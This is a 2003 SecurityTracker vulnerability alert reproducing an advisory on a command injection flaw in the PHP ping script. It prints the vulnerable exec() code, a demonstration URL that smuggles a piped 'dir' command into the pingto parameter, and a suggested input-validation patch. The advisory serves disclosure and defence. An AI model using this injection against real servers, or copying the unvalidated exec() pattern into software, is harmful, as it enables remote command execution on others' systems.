SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   PHP ping Vendors:   Etienne, Matthias
'PHP ping' Lets Remote Users Execute Arbitrary Commands on the Server
SecurityTracker Alert ID:  1006232
SecurityTracker URL:  http://securitytracker.com/id/1006232
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 6 2003
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.1 and prior versions
Description:   An input validation vulnerability was reported in the 'PHP ping' script. A remote user can execute arbitrary operating system commands on the target server.

Security Corporation reported that the script passes user-supplied input to an exec() function call without validating the user-supplied data. A remote user can supply a specially crafted URL to cause arbitrary commands to be executed on the target server with the privileges of the web server.

A demonstration exploit URL is provided:

http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir

The vendor has reportedly been notified.

Impact:   A remote user can execute arbitrary shell commands on the target server with the privileges of the web server PHP process.
Solution:   No vendor solution was available at the time of this entry. The author of the report has provided an unofficial patch, available in the Source Message.
Vendor URL:  www.phpapps.org/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [VulnWatch] [SCSA-009] Remote Command Execution Vulnerability in PHP Ping


________________________________________________________________________

Security Corporation Security Advisory [SCSA-009]
________________________________________________________________________

PROGRAM: PHP Ping
HOMEPAGE: http://www.phpapps.org/
VULNERABLE VERSIONS: v0.1 and prior
________________________________________________________________________

DESCRIPTION
________________________________________________________________________

PHP ping "will allow you, provided that your server turns under Windows,
to realize a "ping" on the host of your choice."

(direct quote from PHP Ping website)


DETAILS
________________________________________________________________________

A vulnerability have been found in PHP ping which allow attackers to
execute remote command.

This vulnerability would allow a remote attacker to compromise parts of
the operating system, possibly the complete operating system.

Vulnerable code :

<?
//*************************************
// FONCTION DU PING
//*************************************
function PHPing($cible,$pingFile){
exec("ping -a -n 1 $cible >$pingFile", $list);
$fd = fopen($pingFile, "r");
while(!feof($fd))
{
$ping.= fgets($fd,256);
}
fclose($fd);
return $ping;
}
//-------------------------------------
?>


EXPLOIT
________________________________________________________________________

The vulnerability was discovered in the page for execute "ping",
at this adress :

http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir

This exploit simply show the contents of the current repertory.

c:\phpping

03/03/2003  23:01       <DIR>          .
03/03/2003  23:01       <DIR>          ..
03/03/2003  23:00       <DIR>          img
30/04/2002  23:13                3217 index.php
30/04/2002  23:19                  921 README
03/03/2003  23:03                    0 resultat.ping
               3 file(s)            4138 bytes
               3 Dir(s)  11413962752 bytes free


SOLUTIONS
________________________________________________________________________

For example use this code :

<?
//*************************************
// FONCTION DU PING
//*************************************
function PHPing($cible,$pingFile){

# BugFix by Gregory LEBRAS www.security-corp.org

if( (!$cible) ||
(!preg_match("/^[\w\d\.\-]+\.[\w\d]{1,3}$/i",$cible)) ){
  echo("Error: Please specify a valid target host or IP.");
  exit;
}
else
{
exec("ping -a -n 1 $cible >$pingFile", $list);
$fd = fopen($pingFile, "r");
while(!feof($fd))
{
$ping.= fgets($fd,256);
}
fclose($fd);
return $ping;
}
}
//------------------------------------


VENDOR STATUS
________________________________________________________________________

The vendor has reportedly been notified.


LINKS
________________________________________________________________________


http://www.security-corp.org/advisories/SCSA-009-FR.txt


------------------------------------------------------------
------------------------------------------------------------





 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC